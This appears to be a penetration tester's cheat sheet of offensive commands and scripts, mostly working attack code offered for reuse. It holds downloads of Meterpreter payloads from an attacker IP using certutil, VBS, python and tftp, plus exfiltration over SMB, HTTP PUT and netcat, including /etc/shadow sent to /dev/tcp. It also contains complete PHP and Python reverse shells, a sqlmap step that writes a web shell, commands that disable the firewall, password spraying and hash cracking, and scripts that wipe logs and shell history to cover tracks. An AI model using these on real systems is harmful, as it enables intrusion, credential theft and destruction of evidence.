If I use it and it's not here, it's probably over here: https://github.com/burmat/burmatscripts
If you have remote command execution on a box with python - something like this should do the trick:
python -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter');"
or if it is a Windows box, it's not much different:
C:\Python2.7\python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/rs_powershell.exe', '/temp/rs_powershell.exe');"
I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"
(originally sourced from here: http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html)
As always, the impacket suite shines. Use smbserver.py
to open an SMB server on your host for file exfiltration:
./smbserver.py burmat_exfil ./loot -username burmat -password burmat## from the target:PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmatPS C:\> mv .\bh.zip Q:\bh.zipPS C:\> net use Q: /delete
perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;'
Picked up from here (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP:
[email protected]:~ ❯ cat /etc/nginx/sites-enabled/file_uploadserver {listen 8001 default_server;server_name burmat.co;location / {root /var/www/upload/;dav_methods PUT;}}[email protected]:~ ❯ service nginx start
Issue a PUT
request from a remote system to upload files to /var/www/upload
on your system:
## CURL:[email protected]:~ ❯ curl -X PUT http://192.168.1.87:8001/l00t.txt -F "[email protected]/home/user/l00t.txt"## POWERSHELLPS C:\Users\victim> Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -Body $(Get-Content l00t.txt)
Because if Netcat is on the system, everything becomes easier:
listener#> nc -l -p 4444 > output.filesender#> nc -w 3 [destination] 4444 < input.file
(and if it's not - go get it: C:\Users\burmat>tftp -i 10.10.10.10 get nc.exe
)
Using certutil.exe
is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods:
certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe
You can also write a file from Base64 encoded text, too:
certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dllregsvr32 /s /u C:\temp\payload.dll
(Source: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html )
If you have SQLi with a user account that has FILE
privileges, you can use sqlmap
to transfer the file to disk without formulating an INFO FILE
query yourself:
[email protected]:~ ❯ sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php
To see if you have the privilege, attempt (you might not have rights) to dump the user
table:
[email protected]:~ ❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_Priv --dump.. SNIP ..[2 entries]+---------+-----------+| User | File_Priv |+---------+-----------+| burmat | Y || root | Y |+---------+-----------+
This is a clever way to get XML over to the system using copy and paste, and writing that XML to file:
PS C:\> $console = [XML] @"<XML CODE CODE HERE>"@# write the xml to file:PS C:\> $console.save("C:\users\burmat\documents\console.xml")
# receiving hostnc -lp 4443 | base64 -d > loot.txt# sender hostbase64 /etc/shadow > /dev/tcp/10.10.10.123/4443
## encode from file with:base64 <<< $(cat shell.py) | tr -d "\n"## decode to file with:echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py
Not a true method of file transfer, but useful nonetheless:
cat /usr/share/nishang/Client/Out-HTA.ps1 | xclip -sel clip
<?php set_time_limit (0); $VERSION = "1.0"; $ip = "10.10.10.10"; $port = 8080; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { exit(1); } $daemon = 1; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>
(originally sourced from: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)
import os,socket,subprocess,threading;def s2p(s, p):while True:data = s.recv(1024)if len(data) > 0:p.stdin.write(data)def p2s(s, p):while True:s.send(p.stdout.read(1))s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("10.11.0.37",4444))p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)s2p_thread = threading.Thread(target=s2p, args=[s, p])s2p_thread.daemon = Trues2p_thread.start()p2s_thread = threading.Thread(target=p2s, args=[s, p])p2s_thread.daemon = Truep2s_thread.start()try:p.wait()except KeyboardInterrupt:s.close()
require 'winrm'conn = WinRM::Connection.new(endpoint: 'https://IP:PORT/wsman',transport: :ssl,user: 'username',password: 'password',:no_ssl_peer_verification => true)command=""conn.shell(:powershell) do |shell|until command == "exit\n" doprint "PS > "command = getsoutput = shell.run(command) do |stdout, stderr|STDOUT.print stdoutSTDERR.print stderrendendputs "Exiting with code #{output.exitcode}"end
(originally sourced from: https://github.com/WinRb/WinRM)
This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (rpm
or dpkg
) on the machine (/tmp/packages.txt
). Copy this file to one that has searchsploit
, and run the script.
Generate the file with: FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
Run the following script: https://github.com/burmat/burmatscripts/blob/master/bash/pkg_lookup.sh
(thanks to chryzsh for doing the heavy lifting)
One of the handiest scripts to find running jobs and processes in real time. Thanks to IppSec for sharing it with the world:
#!/bin/bashIFS=$'\n'old_process=$(ps -eo command)while true; donew_process=$(ps -eo command)diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]sleep 1old_process=$new_processdone
I don't remember where I got this, but incredibly useful to focus in on key info from an snmpwalk
prior to sifting through all of it:
#!/bin/bashfor ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); doecho "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for User Accouints"snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txtecho "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txtecho "Performing snmp-check scan for" $ipsnmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txtecho "Cleaning up empty files..."find ~/Documents/labs/$ip/scans/ -size 0 -print0 |xargs -0 rmdone
You can use a regular-old for loop:
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
Or you can try out the following python script:
#!/usr/bin/pythonimport multiprocessing, subprocess, osdef pinger( job_q, results_q ):DEVNULL = open(os.devnull,'w')while True:ip = job_q.get()if ip is None: breaktry:subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL)results_q.put(ip)except:passif __name__ == '__main__':pool_size = 255jobs = multiprocessing.Queue()results = multiprocessing.Queue()pool = [ multiprocessing.Process(target=pinger, args=(jobs,results)) for i in range(pool_size) ]for p in pool:p.start()for i in range(1,255):jobs.put('10.120.15.{0}'.format(i))for p in pool:jobs.put(None)for p in pool:p.join()while not results.empty():ip = results.get()print(ip)
Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a cmd
prompt:
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt
PS > Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
If you need to add your user to the group, you can use: NET LOCALGROUP "Remote Desktop Users" domain\user /ADD
. And if you need to disable the firewall altogether: NetSh Advfirewall set allprofiles state off
Use exrex
[https://github.com/asciimoo/exrex] to generate a custom wordlists to password spray with:
python exrex.py "(Spring|Winter|Autumn|Fall|Summer|Winter)(20)1[78]!"
I got hit with having to crack mscachev2 hashes which can be slow. This is a perfect time to instead try targeted (small) wordlists and instead pass in some tried-and-tested rules: hashcat64.exe -a 0 -m 2100 -r rules/d3adhob0.rule mscachev2hash.txt wordlist.txt -o cracked.txt
#!/bin/sh/etc/init.d/sysklogd stopVARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"cd /var/logfor ii in $VARLOGS; doecho -n > $iirm -f $ii.? $ii.?.gzdone/etc/init.d/samba stoprm -f /var/log/samba/*rm -f /var/lib/dhcp3/*for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; doecho -n > $iidone
#!/bin/bashecho "COVERING TRACKS"echo "clearing /var/log/auth.log"echo "" > /var/log/auth.logecho "clearing ~/.bash_history"echo "" > ~/.bash_historyecho "clearing /root/.bash_history"echo "" > /root/.bash_historyecho "removing ~/.bash_history"rm ~/.bash_history -rfecho "removing /tmp/"rm -R /tmp/*echo "clearing /var/log/messages"echo "" > /var/log/messagesecho "clearing command history"history -c